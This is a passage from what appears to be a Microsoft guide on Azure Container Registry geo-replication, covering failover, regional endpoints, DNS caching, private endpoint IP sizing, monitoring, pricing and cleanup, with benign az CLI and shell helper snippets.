&lt;LI&gt;&lt;STRONG&gt;Use a short-lived client-side DNS cache like &lt;CODE&gt;dnsmasq&lt;/CODE&gt;&lt;/STRONG&gt; scoped to the duration of a single push, only when you're not using regional endpoints. Do not run a long-lived DNS cache for the global endpoint — it interferes with &lt;CODE&gt;--global-endpoint-routing false&lt;/CODE&gt; and with health-aware failover routing.&lt;/LI&gt;
&lt;LI&gt;&lt;STRONG&gt;Build retry logic into pulls that immediately follow a cross-region push.&lt;/STRONG&gt; Either retry with backoff or check replication status with &lt;A class="lia-external-url" href="https://learn.microsoft.com/en-us/azure/container-registry/container-registry-webhook" target="_blank" rel="noopener"&gt;ACR webhooks&lt;/A&gt; before pulling. After an image or tag is pushed to one geo-replica (say, geo-replica A), ACR can notify you once background replication to another geo-replica (geo-replica B) has succeeded and the image is available to pull there.&lt;/LI&gt;
&lt;LI&gt;&lt;STRONG&gt;Design publish steps to be idempotent&lt;/STRONG&gt; so retries triggered by mid-push failover are safe.&lt;/LI&gt;
&lt;/UL&gt;
&lt;H3 id="q5-auth-behavior-across-endpoint-switches"&gt;Q5. Auth behavior across endpoint switches&lt;/H3&gt;
&lt;P&gt;For safety, treat the global endpoint and each regional endpoint as its own authenticated surface. All registry APIs (auth, manifests, tag resolution, referrers) except the actual blob downloads flow through whichever endpoint you've chosen. &lt;STRONG&gt;If you switch from the global endpoint to a regional endpoint, or from one regional endpoint to another, re-authenticate.&lt;/STRONG&gt; That means &lt;CODE&gt;az acr login&lt;/CODE&gt;, fresh SDK auth, or, for AKS, letting the &lt;A class="lia-external-url" href="https://learn.microsoft.com/en-us/azure/aks/cluster-container-registry-integration" target="_blank" rel="noopener"&gt;Kubernetes ACR credential provider&lt;/A&gt; handle re-auth, which it does automatically when the endpoint changes.&lt;/P&gt;
&lt;H3 id="q6-throttling-under-failover-and-pinning"&gt;Q6. Throttling under failover and pinning&lt;/H3&gt;
&lt;P&gt;Throttling limits on registry API operations are &lt;STRONG&gt;per-replica&lt;/STRONG&gt;, not per-registry. This has two operational implications:&lt;/P&gt;
&lt;UL&gt;
&lt;LI&gt;&lt;STRONG&gt;During health-aware failover&lt;/STRONG&gt;, traffic that was spread across replicas can shift heavily onto whichever replicas remain in the global endpoint's routing pool. Plan capacity so that failover traffic spreads across &lt;STRONG&gt;two or three&lt;/STRONG&gt; healthy replicas rather than concentrating onto one. The global endpoint's routing already does this for you when multiple healthy replicas exist, but registries with only two regions configured can hit per-replica limits more easily during a failover. To mitigate, use regional endpoints to spread workloads across multiple geo-replicas and plan per-replica capacity.&lt;/LI&gt;
&lt;LI&gt;&lt;STRONG&gt;When pinning via regional endpoints (Step 2a)&lt;/STRONG&gt;, you concentrate traffic on whichever replica you've pinned to. If you've pinned all your AKS clusters to a single regional endpoint, you may hit that replica's throttling limits at peak. Mitigations: pin different workloads to different regional endpoints across multiple regions for better topology mapping and capacity distribution, or use the global endpoint (Step 2b) for workloads where you don't need explicit pinning so ACR's routing can spread load. We're also working on improving the throttling metrics surfaced during health-aware failover events.&lt;/LI&gt;
&lt;/UL&gt;
&lt;BLOCKQUOTE&gt;
&lt;P&gt;&lt;STRONG&gt;Note:&lt;/STRONG&gt; &lt;STRONG&gt;Health-aware failover does not reroute traffic based on HTTP 429 (throttling).&lt;/STRONG&gt; If you're experiencing throttling but the region's infrastructure is healthy, the global endpoint continues routing you there. Use regional endpoints to explicitly spread load across replicas for capacity planning.&lt;/P&gt;
&lt;/BLOCKQUOTE&gt;
&lt;H3 id="q7-home-region-outage-scope"&gt;Q7. Home region outage scope&lt;/H3&gt;
&lt;P&gt;Geo-replication provides high availability for the &lt;STRONG&gt;data plane&lt;/STRONG&gt;. During a home region outage, the &lt;STRONG&gt;control plane&lt;/STRONG&gt; is unavailable, which means you can't create or delete replicas, modify network rules, or change replication settings until the home region recovers. &lt;A class="lia-external-url" href="https://learn.microsoft.com/en-us/azure/container-registry/container-registry-tasks-overview" target="_blank" rel="noopener"&gt;ACR Tasks&lt;/A&gt; are also bound to the home region and don't run while it's unavailable. The data plane keeps working:&lt;/P&gt;
&lt;UL&gt;
&lt;LI&gt;&lt;STRONG&gt;Global endpoint&lt;/STRONG&gt; continues routing pulls and pushes to healthy replicas.&lt;/LI&gt;
&lt;LI&gt;&lt;STRONG&gt;Regional endpoints&lt;/STRONG&gt; continue working — you talk directly to specific replicas, and your client-side logic decides which region to use.&lt;/LI&gt;
&lt;LI&gt;&lt;STRONG&gt;Authentication, manifests, blob downloads, webhooks&lt;/STRONG&gt; continue functioning through any healthy replica.&lt;/LI&gt;
&lt;/UL&gt;
&lt;P&gt;The home region of a registry is fixed at creation and cannot be changed afterward. Microsoft's &lt;A class="lia-external-url" href="https://learn.microsoft.com/en-us/azure/azure-resource-manager/management/relocation/relocation-container-registry" target="_blank" rel="noopener"&gt;registry relocation guidance&lt;/A&gt; describes a redeployment procedure — creating a new registry in a different region — not an in-place change to an existing registry's home region.&lt;/P&gt;
&lt;BLOCKQUOTE&gt;
&lt;P&gt;&lt;STRONG&gt;Note:&lt;/STRONG&gt; If your registry uses a &lt;A class="lia-external-url" href="https://learn.microsoft.com/en-us/azure/container-registry/tutorial-enable-customer-managed-keys" target="_blank" rel="noopener"&gt;customer-managed key&lt;/A&gt;, review the &lt;A class="lia-external-url" href="https://learn.microsoft.com/en-us/azure/key-vault/general/disaster-recovery-guidance" target="_blank" rel="noopener"&gt;key vault failover and redundancy guidance&lt;/A&gt; for maximum resilience. Key vault availability directly affects the registry's ability to encrypt and decrypt data.&lt;/P&gt;
&lt;/BLOCKQUOTE&gt;
&lt;H3 id="q8-webhooks-during-failover"&gt;Q8. Webhooks during failover&lt;/H3&gt;
&lt;P&gt;Webhooks fire from the replica that received the push. Because ACR also replicates content to other geo-replicas, webhooks fire from each geo-replica as the image syncs to it — so a single push results in webhook events from the receiving replica plus an event from each replica as replication completes. During a failover where pushes are routed to a different region, webhooks from those pushes fire from the new region; once the original region recovers and replication catches up, webhook events fire from there too. Webhook consumers should be designed to handle multiple events per pushed image and deduplicate as needed.&lt;/P&gt;
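&lt;P&gt;As a rough illustration of consumer-side deduplication, the sketch below keeps the first event seen for each image digest and drops the later ones. The input format (one event per line, as space-separated digest, tag, and source region) and the function name are hypothetical simplifications for this example, not the ACR webhook payload schema; a real consumer would first extract these fields from the webhook JSON.&lt;/P&gt;

```shell
# Hypothetical helper: keep only the first event per image digest.
# Input on stdin: one event per line as "digest tag region"
# (illustrative format, not the actual ACR webhook payload).
dedupe_push_events() {
  awk '!seen[$1]++'
}

# Example: one push received in eastus, then replicated to two other regions,
# followed by a second, unrelated push.
printf '%s\n' \
  'sha256:aaa v1 eastus' \
  'sha256:aaa v1 westus' \
  'sha256:aaa v1 westeurope' \
  'sha256:bbb v2 eastus' | dedupe_push_events
```

&lt;P&gt;Keying on the digest rather than the tag is a design choice for this sketch: it treats a re-push of the same tag with different content as a new event.&lt;/P&gt;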
&lt;H3 id="q9-private-endpoints-with-regional-endpoints-and-dedicated-data-endpoints"&gt;Q9. Private endpoints with regional endpoints and dedicated data endpoints&lt;/H3&gt;
&lt;P&gt;When a &lt;A class="lia-external-url" href="https://learn.microsoft.com/en-us/azure/container-registry/container-registry-private-endpoints" target="_blank" rel="noopener"&gt;private endpoint&lt;/A&gt; is created against a registry, the private endpoint covers &lt;STRONG&gt;all&lt;/STRONG&gt; of the registry's endpoint surfaces — the global endpoint, every regional endpoint (if regional endpoints are enabled), and every regional dedicated data endpoint. A single private endpoint in one VNet can reach the global endpoint (which routes you to a suitable replica), any regional endpoint in the same or a different region, and any region's dedicated data endpoint for blob downloads.&lt;/P&gt;
&lt;P&gt;The trade-off is private IP allocation: each endpoint surface consumes IPs in the VNet. With many replicas plus regional endpoints plus dedicated data endpoints all enabled, private endpoint creation can fail if the VNet runs out of available private IPs.&lt;/P&gt;
&lt;P&gt;&lt;STRONG&gt;IP address consumption per feature:&lt;/STRONG&gt;&lt;/P&gt;
&lt;DIV class="styles_lia-table-wrapper__h6Xo9 styles_table-responsive__MW0lN"&gt;&lt;table border="1" style="border-width: 1px;"&gt;&lt;thead&gt;&lt;tr&gt;&lt;th&gt;Configuration&lt;/th&gt;&lt;th&gt;IPs consumed per VNet&lt;/th&gt;&lt;/tr&gt;&lt;/thead&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td&gt;Initial private endpoint (global endpoint + home region dedicated data endpoint)&lt;/td&gt;&lt;td&gt;2&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;Each geo-replication region added&lt;/td&gt;&lt;td&gt;+1 (regional dedicated data endpoint)&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;Regional endpoints enabled&lt;/td&gt;&lt;td&gt;+1 per geo-replica&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;colgroup&gt;&lt;col style="width: 50.00%" /&gt;&lt;col style="width: 50.00%" /&gt;&lt;/colgroup&gt;&lt;/table&gt;&lt;/DIV&gt;
&lt;P&gt;&lt;STRONG&gt;Example:&lt;/STRONG&gt; A registry with 3 geo-replicas (the home region plus 2 added regions) and regional endpoints enabled consumes &lt;STRONG&gt;7 private IPs&lt;/STRONG&gt; per VNet: 1 (global) + 3 (data) + 3 (regional). Without regional endpoints, the same registry requires &lt;STRONG&gt;4 private IPs&lt;/STRONG&gt;: 1 (global) + 3 (data).&lt;/P&gt;
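&lt;P&gt;The arithmetic in the table can be sketched as a small shell function. The function name and argument order are hypothetical, and the replica count is assumed to include the home region, which is the reading that matches the worked example.&lt;/P&gt;

```shell
# Hypothetical helper: estimate the private IPs one private endpoint consumes per VNet.
# $1 = number of geo-replicas, counting the home region (assumption)
# $2 = "true" if regional endpoints are enabled, anything else otherwise
acr_pe_ip_count() {
  replicas=$1
  regional_enabled=$2
  # 1 IP for the global endpoint plus 1 dedicated data endpoint IP per replica
  total=$((1 + replicas))
  if [ "$regional_enabled" = "true" ]; then
    # regional endpoints add 1 more IP per replica
    total=$((total + replicas))
  fi
  echo "$total"
}

acr_pe_ip_count 3 true    # prints 7
acr_pe_ip_count 3 false   # prints 4
```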
&lt;P&gt;&lt;STRONG&gt;Subnet sizing:&lt;/STRONG&gt; Use at minimum a &lt;CODE&gt;/27&lt;/CODE&gt; (32 addresses) subnet for PE subnets on geo-replicated registries, and &lt;CODE&gt;/24&lt;/CODE&gt; where possible. To check how many private IPs are already consumed on a subnet:&lt;/P&gt;
&lt;PRE class="language-bash" tabindex="0" contenteditable="false" data-lia-code-value="az network vnet subnet show \
  --name &amp;lt;subnet-name&amp;gt; \
  --vnet-name &amp;lt;vnet-name&amp;gt; \
  --resource-group &amp;lt;resource-group&amp;gt; \
  --query &amp;quot;{addressPrefix:addressPrefix, usedIPs:length(ipConfigurations || \`[]\`)}&amp;quot; \
  --output table
"&gt;&lt;CODE&gt;az network vnet subnet show \
  --name &amp;lt;subnet-name&amp;gt; \
  --vnet-name &amp;lt;vnet-name&amp;gt; \
  --resource-group &amp;lt;resource-group&amp;gt; \
  --query "{addressPrefix:addressPrefix, usedIPs:length(ipConfigurations || \`[]\`)}" \
  --output table
&lt;/CODE&gt;&lt;/PRE&gt;
&lt;P&gt;See the &lt;A class="lia-external-url" href="https://learn.microsoft.com/en-us/azure/container-registry/container-registry-private-endpoints" target="_blank" rel="noopener"&gt;ACR private endpoints documentation&lt;/A&gt; for the full IP-allocation math and sizing guidance.&lt;/P&gt;
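&lt;P&gt;To turn a prefix length and a used-IP count into remaining headroom, a sketch like the following may help. It assumes the general Azure networking rule that 5 addresses are reserved in every subnet; the function names are hypothetical, and the used-IP figure is whatever the query above reports, so treat the result as an estimate.&lt;/P&gt;

```shell
# Hypothetical helper: usable addresses in an Azure subnet of a given prefix length.
# Assumes Azure reserves 5 addresses per subnet, so usable = 2^(32 - prefix) - 5.
subnet_usable_ips() {
  prefix=$1
  size=1
  bits=$((32 - prefix))
  while [ "$bits" -gt 0 ]; do
    size=$((size * 2))
    bits=$((bits - 1))
  done
  echo $((size - 5))
}

# Free addresses left after subtracting what is already in use.
# $1 = prefix length, $2 = usedIPs as reported by the subnet query
subnet_free_ips() {
  echo $(( $(subnet_usable_ips "$1") - $2 ))
}

subnet_usable_ips 27      # prints 27
subnet_free_ips 24 40     # prints 211
```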
&lt;H3 id="q10-geo-replica-creation-stuck-for-private-endpoint-enabled-registries"&gt;Q10. Geo-replica creation stuck for private endpoint-enabled registries&lt;/H3&gt;
&lt;P&gt;When creating a geo-replica for a registry that has private endpoints configured, the replica provisioning can get stuck in a &lt;CODE&gt;Creating&lt;/CODE&gt; state if the identity performing the operation doesn't have sufficient permissions to create private endpoint networking resources.&lt;/P&gt;
&lt;P&gt;&lt;STRONG&gt;Solution:&lt;/STRONG&gt;&lt;/P&gt;
&lt;UL&gt;
&lt;LI&gt;Manually delete the geo-replica that got stuck in the provisioning state.&lt;/LI&gt;
&lt;LI&gt;Ensure the identity has the permission &lt;CODE&gt;Microsoft.Network/privateEndpoints/privateLinkServiceProxies/write&lt;/CODE&gt; before creating the geo-replica again.&lt;/LI&gt;
&lt;LI&gt;Also verify that every PE subnet connected to the registry has free IP capacity — if &lt;STRONG&gt;any&lt;/STRONG&gt; PE subnet across any connected VNet does not have enough free IPs, the replication provisioning fails and rolls back. The replica appears briefly in a &lt;CODE&gt;Creating&lt;/CODE&gt; state and then is removed. The resulting error does not identify which subnet or VNet is exhausted.&lt;/LI&gt;
&lt;/UL&gt;
&lt;H3 id="q11-metrics-logs-and-alerts-for-the-three-phases"&gt;Q11. Metrics, logs, and alerts for the three phases&lt;/H3&gt;
&lt;P&gt;We map each phase to the signals available in the Monitoring Guidance section below. The headline: Resource Health (in the Azure portal) and &lt;CODE&gt;az acr replication list&lt;/CODE&gt; give you the platform-side signals; Azure Monitor platform metrics are collected automatically, and resource logs require Diagnostic Settings to be enabled on the customer side.&lt;/P&gt;
&lt;H3 id="behavior-summary"&gt;Behavior summary&lt;/H3&gt;
&lt;DIV class="styles_lia-table-wrapper__h6Xo9 styles_table-responsive__MW0lN"&gt;&lt;table border="1" style="border-width: 1px;"&gt;&lt;thead&gt;&lt;tr&gt;&lt;th&gt;Scenario&lt;/th&gt;&lt;th&gt;Automatic?&lt;/th&gt;&lt;th&gt;Customer Action Required&lt;/th&gt;&lt;th&gt;Notes&lt;/th&gt;&lt;/tr&gt;&lt;/thead&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td&gt;Registry in a region degrades&lt;/td&gt;&lt;td&gt;Yes&lt;/td&gt;&lt;td&gt;None&lt;/td&gt;&lt;td&gt;Health-aware failover; per-registry; minutes-scale; global endpoint operations only&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;Region recovers after a degradation event&lt;/td&gt;&lt;td&gt;Yes&lt;/td&gt;&lt;td&gt;None&lt;/td&gt;&lt;td&gt;No cooldown&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;Pin AKS clusters to co-located replicas&lt;/td&gt;&lt;td&gt;No&lt;/td&gt;&lt;td&gt;Use regional endpoint URLs in deployment manifests (Step 2a)&lt;/td&gt;&lt;td&gt;Coexists with global endpoint&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;No pinning needed for most workloads&lt;/td&gt;&lt;td&gt;Yes&lt;/td&gt;&lt;td&gt;None — keep using &lt;CODE&gt;myregistry.azurecr.io&lt;/CODE&gt; (Step 2b)&lt;/td&gt;&lt;td&gt;Global endpoint plus health-aware failover&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;Push/pull from the same replica (consistency)&lt;/td&gt;&lt;td&gt;No&lt;/td&gt;&lt;td&gt;Use a regional endpoint for both push and pull&lt;/td&gt;&lt;td&gt;Eliminates DNS bouncing and mid-push scatter&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;Capacity planning per region&lt;/td&gt;&lt;td&gt;No&lt;/td&gt;&lt;td&gt;Spread workloads across multiple regional endpoints&lt;/td&gt;&lt;td&gt;Per-replica throttling; avoid concentrating on one replica&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;DR rehearsal: take a replica out of global routing&lt;/td&gt;&lt;td&gt;No&lt;/td&gt;&lt;td&gt;&lt;CODE&gt;az acr replication update --global-endpoint-routing false&lt;/CODE&gt;&lt;/td&gt;&lt;td&gt;Data continues syncing both directions; costs continue 
accruing&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;Re-enable replica participation in global routing&lt;/td&gt;&lt;td&gt;No&lt;/td&gt;&lt;td&gt;&lt;CODE&gt;az acr replication update --global-endpoint-routing true&lt;/CODE&gt;&lt;/td&gt;&lt;td&gt;No cooldown; replica is immediately ready&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;Switch a workload between endpoints&lt;/td&gt;&lt;td&gt;No&lt;/td&gt;&lt;td&gt;Re-auth (&lt;CODE&gt;az acr login&lt;/CODE&gt;, SDK auth, or Kubernetes ACR credential provider)&lt;/td&gt;&lt;td&gt;Each endpoint is its own authenticated surface&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;Initial replica seeding on a live registry&lt;/td&gt;&lt;td&gt;N/A&lt;/td&gt;&lt;td&gt;None&lt;/td&gt;&lt;td&gt;Existing replica continues serving traffic; seeding time scales with &lt;STRONG&gt;registry size&lt;/STRONG&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;Long-running push during a failover&lt;/td&gt;&lt;td&gt;No&lt;/td&gt;&lt;td&gt;Retry; design publishes to be idempotent&lt;/td&gt;&lt;td&gt;Pin via regional endpoint to avoid mid-push scatter; ACR is tightening this behavior&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;Pull of a recently pushed image from a different region&lt;/td&gt;&lt;td&gt;No&lt;/td&gt;&lt;td&gt;Wait for replication, retry with backoff, or check replication status&lt;/td&gt;&lt;td&gt;Eventual consistency; bounded staleness consistency in development&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;Home region outage&lt;/td&gt;&lt;td&gt;Data plane: yes; control plane: no&lt;/td&gt;&lt;td&gt;Use global or regional endpoints for data plane operations&lt;/td&gt;&lt;td&gt;Control plane (replica config, network rules) requires home region&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;colgroup&gt;&lt;col style="width: 25.00%" /&gt;&lt;col style="width: 25.00%" /&gt;&lt;col style="width: 25.00%" /&gt;&lt;col style="width: 25.00%" /&gt;&lt;/colgroup&gt;&lt;/table&gt;&lt;/DIV&gt;
&lt;H2 id="dns-and-client-side-considerations"&gt;DNS and Client-Side Considerations&lt;/H2&gt;
&lt;P&gt;DNS bouncing during a single push is the most common geo-replication push problem in customer threads, and it warrants a section of its own.&lt;/P&gt;
&lt;P&gt;&lt;STRONG&gt;The failure mode.&lt;/STRONG&gt; A &lt;CODE&gt;docker push&lt;/CODE&gt; is a sequence of HTTP requests: blob uploads for each layer, then a manifest upload that references those layers by digest. If the Linux DNS resolver on the client doesn't cache &lt;CODE&gt;myregistry.azurecr.io&lt;/CODE&gt; consistently for the duration of the push, individual sub-requests can resolve to different replicas. Because replication is eventually consistent, the manifest can land on a replica that doesn't yet have the layers it references, and the manifest validation fails.&lt;/P&gt;
&lt;P&gt;&lt;STRONG&gt;The two mitigations:&lt;/STRONG&gt;&lt;/P&gt;
&lt;OL&gt;
&lt;LI&gt;&lt;STRONG&gt;Regional endpoints&lt;/STRONG&gt; pin the push to a single replica end-to-end. Every sub-request — login, blob uploads, manifest upload — goes to the same replica. This is the cleanest fix and the one we recommend for any pipeline where push/pull consistency matters.&lt;/LI&gt;
&lt;LI&gt;&lt;STRONG&gt;A short-lived client-side DNS cache like &lt;CODE&gt;dnsmasq&lt;/CODE&gt;&lt;/STRONG&gt; scoped to the duration of a single push. For Linux VMs in Azure, follow the &lt;A class="lia-external-url" href="https://learn.microsoft.com/en-us/azure/virtual-machines/linux/azure-dns" target="_blank" rel="noopener"&gt;DNS name resolution options&lt;/A&gt; guidance. The pin should last the push and no longer. For other clients that push images, configure your stack's DNS resolver with a similar short-lived cache so the global endpoint's resolved address stays pinned only for the duration of a single image push.&lt;/LI&gt;
&lt;/OL&gt;
&lt;P&gt;&lt;STRONG&gt;A note on long-lived DNS caching for the global endpoint.&lt;/STRONG&gt; Don't run a long-lived DNS cache for &lt;CODE&gt;myregistry.azurecr.io&lt;/CODE&gt;. ACR purges its own DNS records on the server side when a replica is taken out of global routing (Step 3) and during health-aware failover; a long-lived client-side cache will keep clients pointed at the old region after our purge, which makes both the manual disable mechanism and health-aware failover look broken from the client's perspective.&lt;/P&gt;
&lt;P&gt;&lt;STRONG&gt;Retry behavior:&lt;/STRONG&gt;&lt;/P&gt;
&lt;UL&gt;
&lt;LI&gt;In-flight pushes during a failover may fail. Design publish steps to be idempotent so retries are safe.&lt;/LI&gt;
&lt;LI&gt;Pipelines that push in one region and immediately pull from a different region should retry with backoff or check replication status — eventual consistency means the pull may race ahead of replication.&lt;/LI&gt;
&lt;LI&gt;ACR is working on bounded staleness consistency, which addresses this directly by proxying (on ACR infrastructure) a pull request from a geo-replica that does not yet have the image to another geo-replica that does; see Q4.&lt;/LI&gt;
&lt;/UL&gt;
&lt;BLOCKQUOTE&gt;
&lt;P&gt;&lt;STRONG&gt;Note:&lt;/STRONG&gt; Specific retry counts, back-off intervals, and push timeout values are application-layer decisions. The platform behavior is documented; the retry policy belongs to your client.&lt;/P&gt;
&lt;/BLOCKQUOTE&gt;
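&lt;P&gt;For pipelines that choose retry with backoff, a minimal client-side sketch might look like the following. The function name, the attempt count, and the delay values are illustrative assumptions, not recommended settings; the command being retried is whatever your pipeline already runs.&lt;/P&gt;

```shell
# Hypothetical helper: run a command until it succeeds, doubling the wait each time.
# $1 = maximum attempts, $2 = initial delay in seconds, remaining args = command
retry_with_backoff() {
  max_attempts=$1
  delay=$2
  shift 2
  attempt=1
  while true; do
    if "$@"; then
      return 0
    fi
    if [ "$attempt" -ge "$max_attempts" ]; then
      echo "giving up after $attempt attempts: $*"
      return 1
    fi
    sleep "$delay"
    delay=$((delay * 2))
    attempt=$((attempt + 1))
  done
}

# Example (image name and retry values are placeholders, not recommendations):
# retry_with_backoff 5 2 docker pull myregistry.azurecr.io/myapp:v1
```

&lt;P&gt;Because the helper reruns the whole command, it is only safe around steps that are idempotent, which matches the guidance above for publish steps.&lt;/P&gt;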
&lt;H2 id="monitoring-guidance"&gt;Monitoring Guidance&lt;/H2&gt;
&lt;P&gt;We map the three phases to the signals available from each source. Where a signal requires customer-side configuration, we flag it.&lt;/P&gt;
&lt;H3 id="phase-a-initial-replication-after-creating-a-new-replica-"&gt;Phase A: Initial replication (after creating a new replica)&lt;/H3&gt;
&lt;UL&gt;
&lt;LI&gt;&lt;STRONG&gt;&lt;CODE&gt;az acr replication list&lt;/CODE&gt; and &lt;CODE&gt;az acr replication show&lt;/CODE&gt;&lt;/STRONG&gt; — confirm the new replica reaches &lt;CODE&gt;provisioningState: Succeeded&lt;/CODE&gt; and &lt;CODE&gt;status: online&lt;/CODE&gt;, and view per-replica status.&lt;/LI&gt;
&lt;LI&gt;&lt;STRONG&gt;Azure Monitor platform metrics&lt;/STRONG&gt; — push count, pull count, and other registry metrics are collected automatically and visible in the Azure portal under Metrics. No customer configuration is needed to view platform metrics. To &lt;STRONG&gt;export&lt;/STRONG&gt; metrics or enable &lt;STRONG&gt;resource logs&lt;/STRONG&gt; (detailed operation logs), configure &lt;A class="lia-external-url" href="https://learn.microsoft.com/en-us/azure/container-registry/monitor-service" target="_blank" rel="noopener"&gt;Diagnostic Settings&lt;/A&gt; on the registry.&lt;/LI&gt;
&lt;/UL&gt;
&lt;H3 id="phase-b-failover-planned-via-replica-disable-or-automatic-via-health-aware-failover-"&gt;Phase B: Failover (planned via replica disable, or automatic via health-aware failover)&lt;/H3&gt;
&lt;UL&gt;
&lt;LI&gt;&lt;STRONG&gt;Per-replica &lt;CODE&gt;regionEndpointEnabled&lt;/CODE&gt; state&lt;/STRONG&gt; via &lt;CODE&gt;az acr replication list&lt;/CODE&gt;: confirms whether a manual disable took effect, i.e. which replicas are currently eligible for global endpoint routing. Note: this flag reflects the &lt;STRONG&gt;manual configuration&lt;/STRONG&gt; of a geo-replica's eligibility for global endpoint routing; it does not indicate whether health-aware failover has actively rerouted traffic away from a replica.&lt;/LI&gt;
&lt;LI&gt;&lt;STRONG&gt;Resource Health&lt;/STRONG&gt; for the registry (in the Azure portal under &lt;STRONG&gt;Help &amp;gt; Resource health&lt;/STRONG&gt;) — surfaces platform-side degradation signals during incidents. ACR does not yet expose a definitive "this region is currently serving your traffic" signal; Resource Health and client-side latency changes are the best available indicators.&lt;/LI&gt;
&lt;LI&gt;&lt;STRONG&gt;Pull latency from clients&lt;/STRONG&gt; — increased latency from a more distant replica is the client-observable signal that traffic has rerouted.&lt;/LI&gt;
&lt;LI&gt;&lt;STRONG&gt;Azure Monitor platform metrics&lt;/STRONG&gt; — visible per-region in the Azure portal Metrics blade. To export metrics or query them programmatically, enable Diagnostic Settings.&lt;/LI&gt;
&lt;/UL&gt;
&lt;H3 id="phase-c-failback-replica-returns-to-global-routing-"&gt;Phase C: Failback (replica returns to global routing)&lt;/H3&gt;
&lt;UL&gt;
&lt;LI&gt;&lt;STRONG&gt;&lt;CODE&gt;az acr replication list&lt;/CODE&gt;&lt;/STRONG&gt; — confirms &lt;CODE&gt;regionEndpointEnabled: True&lt;/CODE&gt; (manual) or &lt;CODE&gt;online&lt;/CODE&gt; status across all replicas (automatic).&lt;/LI&gt;
&lt;LI&gt;&lt;STRONG&gt;Pull latency normalizing&lt;/STRONG&gt; as clients reach the recovered replica again.&lt;/LI&gt;
&lt;LI&gt;&lt;STRONG&gt;Resource Health&lt;/STRONG&gt; clearing for the registry (visible in the Azure portal).&lt;/LI&gt;
&lt;/UL&gt;
&lt;BLOCKQUOTE&gt;
&lt;P&gt;&lt;STRONG&gt;Note:&lt;/STRONG&gt; The health-aware failover blog calls out ongoing work to surface richer signals — including notifications for when routing changes and which region is currently serving your traffic. The signals listed above are what's available today.&lt;/P&gt;
&lt;/BLOCKQUOTE&gt;
&lt;H2 id="pricing-considerations"&gt;Pricing Considerations&lt;/H2&gt;
&lt;UL&gt;
&lt;LI&gt;&lt;STRONG&gt;Storage billing vs. storage quota&lt;/STRONG&gt;: Storage is &lt;STRONG&gt;billed&lt;/STRONG&gt; per geo-replica — a 1 GiB image replicated to 5 geo-replicas is charged as 5 GiB of storage (1 GiB × 5 geo-replicas). However, storage &lt;STRONG&gt;quota&lt;/STRONG&gt; (the tier's maximum storage limit) counts the image only once — the same 1 GiB image counts as 1 GiB toward your tier's maximum, not 5 GiB.&lt;/LI&gt;
&lt;LI&gt;&lt;STRONG&gt;Data transfer&lt;/STRONG&gt;: Geo-replication can reduce costs by enabling in-region image pushes and pulls, which avoids cross-region data transfer charges during these push or pull operations. However, cross-region data transfer charges still apply when ACR replicates pushed content to other geo-replicas as part of eventual consistency.&lt;/LI&gt;
&lt;LI&gt;&lt;STRONG&gt;Disabled replicas still cost&lt;/STRONG&gt;: When you take a replica out of global routing with &lt;CODE&gt;--global-endpoint-routing false&lt;/CODE&gt;, storage and per-replica costs continue accruing because data continues syncing bidirectionally.&lt;/LI&gt;
&lt;/UL&gt;
&lt;P&gt;For more information, see &lt;A class="lia-external-url" href="https://azure.microsoft.com/pricing/details/container-registry/" target="_blank" rel="noopener"&gt;ACR pricing&lt;/A&gt;.&lt;/P&gt;
&lt;H2 id="cleanup"&gt;Cleanup&lt;/H2&gt;
&lt;P&gt;Run these commands to undo the walkthrough setup. Order matters: disable regional endpoints before deleting replicas, since regional endpoint URLs depend on which replicas exist.&lt;/P&gt;
&lt;PRE class="language-bash" tabindex="0" contenteditable="false" data-lia-code-value="# Disable regional endpoints if you enabled them in Step 2a
az acr update -n myregistry -g myrg --regional-endpoints disabled

# Re-enable any replicas you disabled in Step 3 (no-op if already enabled)
az acr replication update --registry myregistry --name westus \
  --global-endpoint-routing true

# Delete the West US replica created in Step 1
az acr replication delete --registry myregistry --name westus

# Confirm only the home region replica remains
az acr replication list --registry myregistry --output table
"&gt;&lt;CODE&gt;# Disable regional endpoints if you enabled them in Step 2a
az acr update -n myregistry -g myrg --regional-endpoints disabled

# Re-enable any replicas you disabled in Step 3 (no-op if already enabled)
az acr replication update --registry myregistry --name westus \
  --global-endpoint-routing true

# Delete the West US replica created in Step 1
az acr replication delete --registry myregistry --name westus

# Confirm only the home region replica remains
az acr replication list --registry myregistry --output table
&lt;/CODE&gt;&lt;/PRE&gt;
&lt;BLOCKQUOTE&gt;
&lt;P&gt;&lt;STRONG&gt;Note:&lt;/STRONG&gt; Replica deletion is a control-plane operation that requires the home region to be available. During a home region outage, replica configuration cannot be modified.&lt;/P&gt;
&lt;/BLOCKQUOTE&gt;
&lt;H2 id="summary-table"&gt;Summary Table&lt;/H2&gt;
